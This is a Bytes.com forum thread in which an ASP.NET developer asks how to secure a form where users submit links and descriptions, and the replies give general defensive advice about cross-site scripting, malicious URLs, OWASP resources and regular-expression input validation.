473,320 Members | 2,109 Online
Bytes | Software Development & Data Engineering Community
Post Job

Home Posts Topics Members FAQ

Join Bytes to post your question to a community of 473,320 software developers and data experts.

Security issues relating to submitting href links and text:

I am currently developing a website (ASP.NET) which allows users to
submit a web form containing a href link in one field and descriptive text
in another field. The records will stored to varchar columns in a SQL Server
2000 database and hosted by a 3rd party ISP. The list of links will then be
made available to other users.
What general security precautions should be taken when developing a
website of this nature? Specifically, I am concerned about the possibility
of malicious SQL or ASP script insertion and it's impact on the web or
database server. I am already using client and server side validation to
restrict the description field to alpha-numeric characters, period and
spaces.
Jul 21 '05 #1
2 1274
Cross-site scripting vulnerabilities for starters...

Think about exploits that come out for Internet Explorer that rely on
carefully crafted malicious URLs. Someone could submit one of those into
your system. Alternatively, they might submit a link that grabs cookies for
your domain, and redirects them to a site of the user's choosing. Etc

Check out the OWASP website (www.owasp.org) for more information on securing
web applications.
Microsoft also as a book you can download from MSDN on building secure
ASP.Net applications. Get that as well.

Cheers
Ken

"Chipmunk" <re***@newsgroup.com> wrote in message
news:ex****************@TK2MSFTNGP09.phx.gbl...
: I am currently developing a website (ASP.NET) which allows users to
: submit a web form containing a href link in one field and descriptive text
: in another field. The records will stored to varchar columns in a SQL
Server
: 2000 database and hosted by a 3rd party ISP. The list of links will then
be
: made available to other users.
: What general security precautions should be taken when developing a
: website of this nature? Specifically, I am concerned about the possibility
: of malicious SQL or ASP script insertion and it's impact on the web or
: database server. I am already using client and server side validation to
: restrict the description field to alpha-numeric characters, period and
: spaces.
:
:
Jul 21 '05 #2
Please do not cross-post to so many newsgroups.

Regular expressions are your friends-- use them wisely. You'll want to
ensure that the data entered matches the formats you expect (easy for URLs,
harder for "descriptive text"). See http://www.devx.com/vb2themax/Tip/19510
for instance.

--
Thanks,

Eric Lawrence
Program Manager
Assistance and Worldwide Services

This posting is provided "AS IS" with no warranties, and confers no rights.

"Chipmunk" <re***@newsgroup.com> wrote in message
news:ex**************@TK2MSFTNGP09.phx.gbl...
I am currently developing a website (ASP.NET) which allows users to
submit a web form containing a href link in one field and descriptive text
in another field. The records will stored to varchar columns in a SQL Server 2000 database and hosted by a 3rd party ISP. The list of links will then be made available to other users.
What general security precautions should be taken when developing a
website of this nature? Specifically, I am concerned about the possibility
of malicious SQL or ASP script insertion and it's impact on the web or
database server. I am already using client and server side validation to
restrict the description field to alpha-numeric characters, period and
spaces.

Jul 21 '05 #3

This thread has been closed and replies have been disabled. Please start a new discussion.

Similar topics

8
by: jasonbrown1999 | last post by:
Someone told me the following script could be used to run harmful commands on the server, by passing commands into the script. What the script does is encode an affiliate URL, create two frames,...
1
by: Display Name | last post by:
the customer I'm developing a site for uses a canned form-parsing page that allows her to have an email subscription opt-in page add emails to a list she can manage using a link that you point your...
2
by: Heiko Pliefke | last post by:
Hi NG! I have to change dynamically all hyperlinks, when the html-page is loaded at the client. This works fine, except in the following scenario: When the innerText of an anchor contains an...
7
by: Neil | last post by:
I found some code on a web site regarding accessing the html dom using javascript, where the html resides in a frame. So I wrote a html document with a frame which points to a real website, and...
2
by: Chipmunk | last post by:
I am currently developing a website (ASP.NET) which allows users to submit a web form containing a href link in one field and descriptive text in another field. The records will stored to varchar...
31
by: Yeah | last post by:
Is it absolutely necessary to include "http://" in an A HREF hyperlink? Would it be wise to remove this from one's Links page, just to save code?
1
by: macklin01 | last post by:
Hi, everybody. I'm trying to do some last cleaning up on the following php page I wrote: http://www.math.uci.edu/~pmacklin/Publications.php This URL parses an XML file of publications: ...
5
by: Alex | last post by:
Hello, I hope I can explain this properly. I'm writing an application with a tabbed-based navigation, and a form which gets filled out by users will be split into 5 subtabs. What I need is...
2
by: mike2098 | last post by:
Hi I have a form with drop down boxes, tinymce and an ajax file up-loader I want to be able to submit the form and store all the data on a mysql db the trouble I have is I do not know how to...
0
by: DolphinDB | last post by:
Tired of spending countless mintues downsampling your data? Look no further! In this article, you’ll learn how to efficiently downsample 6.48 billion high-frequency records to 61 million...
0
by: ryjfgjl | last post by:
ExcelToDatabase: batch import excel into database automatically...
0
isladogs
by: isladogs | last post by:
The next Access Europe meeting will be on Wednesday 6 Mar 2024 starting at 18:00 UK time (6PM UTC) and finishing at about 19:15 (7.15PM). In this month's session, we are pleased to welcome back...
1
isladogs
by: isladogs | last post by:
The next Access Europe meeting will be on Wednesday 6 Mar 2024 starting at 18:00 UK time (6PM UTC) and finishing at about 19:15 (7.15PM). In this month's session, we are pleased to welcome back...
1
by: CloudSolutions | last post by:
Introduction: For many beginners and individual users, requiring a credit card and email registration may pose a barrier when starting to use cloud servers. However, some cloud server providers now...
1
by: Defcon1945 | last post by:
I'm trying to learn Python using Pycharm but import shutil doesn't work
1
by: Shællîpôpï 09 | last post by:
If u are using a keypad phone, how do u turn on JavaScript, to access features like WhatsApp, Facebook, Instagram....
0
by: af34tf | last post by:
Hi Guys, I have a domain whose name is BytesLimited.com, and I want to sell it. Does anyone know about platforms that allow me to list my domain in auction for free. Thank you
0
isladogs
by: isladogs | last post by:
The next Access Europe User Group meeting will be on Wednesday 3 Apr 2024 starting at 18:00 UK time (6PM UTC+1) and finishing by 19:30 (7.30PM). In this session, we are pleased to welcome former...

By using Bytes.com and it's services, you agree to our Privacy Policy and Terms of Use.

To disable or enable advertisements and analytics tracking please visit the manage ads & tracking page.